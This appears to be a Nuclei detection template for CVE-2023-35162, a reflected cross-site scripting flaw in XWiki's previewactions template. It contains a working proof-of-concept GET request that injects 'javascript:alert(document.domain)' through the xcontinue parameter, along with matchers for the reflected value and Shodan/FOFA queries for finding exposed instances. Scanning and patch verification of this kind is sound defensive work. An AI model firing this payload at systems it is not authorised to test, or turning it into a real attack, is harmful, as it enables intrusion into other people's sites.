Description
XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
id: CVE-2023-35162
info:
name: XWiki < 14.10.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
impact: |
Successful exploitation could lead to unauthorized access or data theft.
remediation: |
Apply the latest patches provided by XWiki to mitigate the vulnerability.
reference:
- https://jira.xwiki.org/browse/XWIKI-20342
- https://github.com/xwiki/xwiki-platform/blob/244dbbaa0738a0c40b19929c0369c8b62ae5236e/xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/previewactions.vm#L48
- https://nvd.nist.gov/vuln/detail/CVE-2023-35162
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35162
cwe-id: CWE-79
epss-score: 0.02377
epss-percentile: 0.83017
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xwiki
product: xwiki
shodan-query:
- XWiki
- xwiki
- http.html:"data-xwiki-reference"
fofa-query: "body=\"data-xwiki-reference\""
tags: cve,cve2023,xwiki,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"
matchers:
- type: dsl
dsl:
- 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")'
- 'contains(body, "previewactions.vm")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402203143de05366e24f177600549667b6102f33bb32c1ed244f756c7f66594e29a93022003b97df31ea70a238e145cb4a7919bc005cb6896eb5584d7d345c34ce4c69895:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.